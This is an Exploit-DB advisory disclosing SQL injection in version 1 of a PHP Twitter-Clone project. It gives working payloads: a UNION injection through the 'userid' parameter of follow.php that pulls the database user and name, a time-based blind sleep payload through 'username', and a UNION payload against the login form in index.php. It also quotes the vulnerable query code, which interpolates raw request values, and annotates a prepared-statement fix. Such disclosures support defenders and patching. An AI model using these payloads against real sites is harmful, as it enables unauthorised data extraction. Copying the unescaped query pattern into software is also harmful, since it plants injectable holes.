Twitter-Clone 1 - 'userid' SQL Injection

EDB-ID:

45230

CVE:

N/A


Author:

L0RD

Type:

webapps


Platform:

PHP

Date:

2018-08-21


# Exploit Title: Twitter-Clone 1 - 'userid' SQL Injection
# Date: 2018-08-21
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
# Version: 1
# CVE: N/A
# Tested on: Win 10

# POC : SQLi
# vulnerable files : follow.php , index.php
# vulnerable parameters : userid , username

# 1) follow.php :

# Parameters : userid , username
# Type : Union query (userid)
# Type : Time-based blind (username)
# Payloads :

userid: ' UNION SELECT 1,2,user(),4,database(),6,7%23
username: ' AND sleep(10)%23

# vulnerable code :

// Excerpt from follow.php; the enclosing if-blocks are left open in this listing.
// Truthiness check only: it establishes presence, not format, of the two GET values.
if($_GET['userid']  && $_GET['username']){
// Loose (!=) comparison; this guard only prevents following oneself and does
// nothing to validate or constrain the value of userid.
if($_GET['userid']!=$user_id){
// Raw request values, no casting or escaping. $follow_username is assigned
// here but is not used in the query shown below.
$follow_userid = $_GET['userid'];
$follow_username = $_GET['username'];
include 'connect.php';
// Injection point: $follow_userid is interpolated straight into the SQL string
// ($user_id is defined outside this excerpt). Mitigation: use mysqli_prepare()
// with a bound parameter (bind_param), or at minimum cast to int if ids are
// numeric / apply mysqli_real_escape_string() before interpolation.
$query = mysqli_query($con, "SELECT id
    FROM following
WHERE user1_id='$user_id' AND user2_id='$follow_userid'
");

# 2) index.php :

# vulnerable parameter : username
# Type : Union query
# Payload : 

' union select 1,2,user(),4,5,6

# vulnerable code :

if($_POST['login-btn']=="login-submit"){
if($_POST['username'] != "" && $_POST['password'] != ""){
$username = strtolower($_POST['username']);
include "connect.php";
$query = mysqli_query($con, "SELECT id, password
FROM users
 WHERE username='$username'");